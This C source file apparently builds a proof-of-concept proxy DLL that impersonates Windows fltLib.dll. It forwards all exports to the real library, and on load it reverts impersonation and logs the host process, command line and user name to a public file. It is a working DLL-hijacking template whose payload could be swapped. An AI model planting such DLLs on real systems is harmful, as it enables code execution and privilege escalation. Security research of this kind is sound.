// Build notes (as given by the author):
// c:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat
// cl.exe /D_USRDLL /D_WINDLL /MT /Tc raw.cpp /link /DLL /out:raw.dll /SUBSYSTEM:WINDOWS /MACHINE:x64
//
// Forwarder exports, ordinals 1..29.  Each "/export:Name=Target,@N" makes
// the linker emit a forwarded export instead of code: a caller resolving
// Name from this DLL is redirected to Target.  The targets below are
// spelled with the absolute System32 path, so the real fltLib.dll is
// named explicitly rather than found through the normal DLL search order.
#pragma comment(linker, "/export:FilterAttach=C:\\Windows\\System32\\fltLib.FilterAttach,@1")
#pragma comment(linker, "/export:FilterAttachAtAltitude=C:\\Windows\\System32\\fltLib.FilterAttachAtAltitude,@2")
#pragma comment(linker, "/export:FilterClose=C:\\Windows\\System32\\fltLib.FilterClose,@3")
#pragma comment(linker, "/export:FilterConnectCommunicationPort=C:\\Windows\\System32\\fltLib.FilterConnectCommunicationPort,@4")
#pragma comment(linker, "/export:FilterCreate=C:\\Windows\\System32\\fltLib.FilterCreate,@5")
#pragma comment(linker, "/export:FilterDetach=C:\\Windows\\System32\\fltLib.FilterDetach,@6")
#pragma comment(linker, "/export:FilterFindClose=C:\\Windows\\System32\\fltLib.FilterFindClose,@7")
#pragma comment(linker, "/export:FilterFindFirst=C:\\Windows\\System32\\fltLib.FilterFindFirst,@8")
#pragma comment(linker, "/export:FilterFindNext=C:\\Windows\\System32\\fltLib.FilterFindNext,@9")
#pragma comment(linker, "/export:FilterGetDosName=C:\\Windows\\System32\\fltLib.FilterGetDosName,@10")
#pragma comment(linker, "/export:FilterGetInformation=C:\\Windows\\System32\\fltLib.FilterGetInformation,@11")
#pragma comment(linker, "/export:FilterGetMessage=C:\\Windows\\System32\\fltLib.FilterGetMessage,@12")
#pragma comment(linker, "/export:FilterInstanceClose=C:\\Windows\\System32\\fltLib.FilterInstanceClose,@13")
#pragma comment(linker, "/export:FilterInstanceCreate=C:\\Windows\\System32\\fltLib.FilterInstanceCreate,@14")
#pragma comment(linker, "/export:FilterInstanceFindClose=C:\\Windows\\System32\\fltLib.FilterInstanceFindClose,@15")
#pragma comment(linker, "/export:FilterInstanceFindFirst=C:\\Windows\\System32\\fltLib.FilterInstanceFindFirst,@16")
#pragma comment(linker, "/export:FilterInstanceFindNext=C:\\Windows\\System32\\fltLib.FilterInstanceFindNext,@17")
#pragma comment(linker, "/export:FilterInstanceGetInformation=C:\\Windows\\System32\\fltLib.FilterInstanceGetInformation,@18")
// NOTE(review): this entry is the only one of the 29 whose target omits the
// C:\Windows\System32 prefix, so it is resolved differently from its
// siblings.  Looks like an inconsistency rather than intent -- verify.
#pragma comment(linker, "/export:FilterLoad=fltLib.FilterLoad,@19")
#pragma comment(linker, "/export:FilterReplyMessage=C:\\Windows\\System32\\fltLib.FilterReplyMessage,@20")
#pragma comment(linker, "/export:FilterSendMessage=C:\\Windows\\System32\\fltLib.FilterSendMessage,@21")
#pragma comment(linker, "/export:FilterUnload=C:\\Windows\\System32\\fltLib.FilterUnload,@22")
#pragma comment(linker, "/export:FilterVolumeClose=C:\\Windows\\System32\\fltLib.FilterVolumeClose,@23")
#pragma comment(linker, "/export:FilterVolumeFindClose=C:\\Windows\\System32\\fltLib.FilterVolumeFindClose,@24")
#pragma comment(linker, "/export:FilterVolumeFindFirst=C:\\Windows\\System32\\fltLib.FilterVolumeFindFirst,@25")
#pragma comment(linker, "/export:FilterVolumeFindNext=C:\\Windows\\System32\\fltLib.FilterVolumeFindNext,@26")
#pragma comment(linker, "/export:FilterVolumeInstanceFindClose=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindClose,@27")
#pragma comment(linker, "/export:FilterVolumeInstanceFindFirst=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindFirst,@28")
#pragma comment(linker, "/export:FilterVolumeInstanceFindNext=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindNext,@29")
// This time we do need a proper proxy DLL, hence pragmas above. We are proxying fltLib.dll.
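#include <windows.h>
#include <string.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"advapi32.lib")

/* Append one NUL-terminated string to an already-open file handle.
 * The WriteFile result is deliberately not checked: this is a best-effort
 * trace and DllMain has nobody to report a write failure to. */
static void write_str(HANDLE hFile, const char *s)
{
    DWORD bytesWritten = 0;
    WriteFile(hFile, s, (DWORD)strlen(s), &bytesWritten, NULL);
}

/* Entry point of the proxy DLL.
 *
 * On DLL_PROCESS_ATTACH it reverts any thread impersonation and then appends
 * one line of the form "<host module path> [ <command line> ] [ <user name> ]"
 * to C:\users\Public\poc.txt, so the process that loaded this DLL in place of
 * fltLib.dll can be identified from the file afterwards.  Every other
 * ul_reason_for_call is ignored.  hModule and lpReserved are unused.
 *
 * Returns TRUE unconditionally; the DLL never refuses to load.
 *
 * NOTE(review): all of this runs under the loader lock.  The DllMain
 * documentation discourages file I/O and other non-trivial work there; it is
 * kept because producing the trace is the purpose of this file.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call != DLL_PROCESS_ATTACH) {
        return TRUE;
    }

    RevertToSelf(); /* if possible, revert the impersonation of the current thread */

    /* Zero-initialised so a failed lookup yields an empty string.  The original
     * "memcpy(buf, "", 104)" read 104 (resp. MAX_PATH) bytes out of a 1-byte
     * literal, which is an out-of-bounds read. */
    char user_name[104] = { 0 };
    char module_fname[MAX_PATH] = { 0 };
    DWORD max_user_name = (DWORD)sizeof(user_name);

    /* GetCommandLineA is not documented to return NULL, but strlen(NULL)
     * would crash the host, so fall back to an empty string just in case. */
    LPSTR command_line = GetCommandLineA();
    const char *cmd = (command_line != NULL) ? command_line : "";

    /* Pass one byte less than the buffer so the final NUL survives even if
     * the path is truncated. */
    GetModuleFileNameA(NULL, module_fname, (DWORD)sizeof(module_fname) - 1);
    GetUserNameA(user_name, &max_user_name);

    HANDLE hFile = CreateFileA("C:\\users\\Public\\poc.txt", GENERIC_WRITE, FILE_SHARE_WRITE,
                               NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE) {
        /* OPEN_ALWAYS positions at offset 0; move to the end so that
         * successive loads append rather than overwrite. */
        SetFilePointer(hFile, 0, NULL, FILE_END);
        write_str(hFile, module_fname);
        write_str(hFile, " [ ");
        write_str(hFile, cmd);
        write_str(hFile, " ] ");  /* original used strlen(left_bracket) here; same length, now the right string */
        write_str(hFile, " [ ");
        write_str(hFile, user_name);
        write_str(hFile, " ] ");
        write_str(hFile, "\n");
        CloseHandle(hFile);
    }

    return TRUE;
}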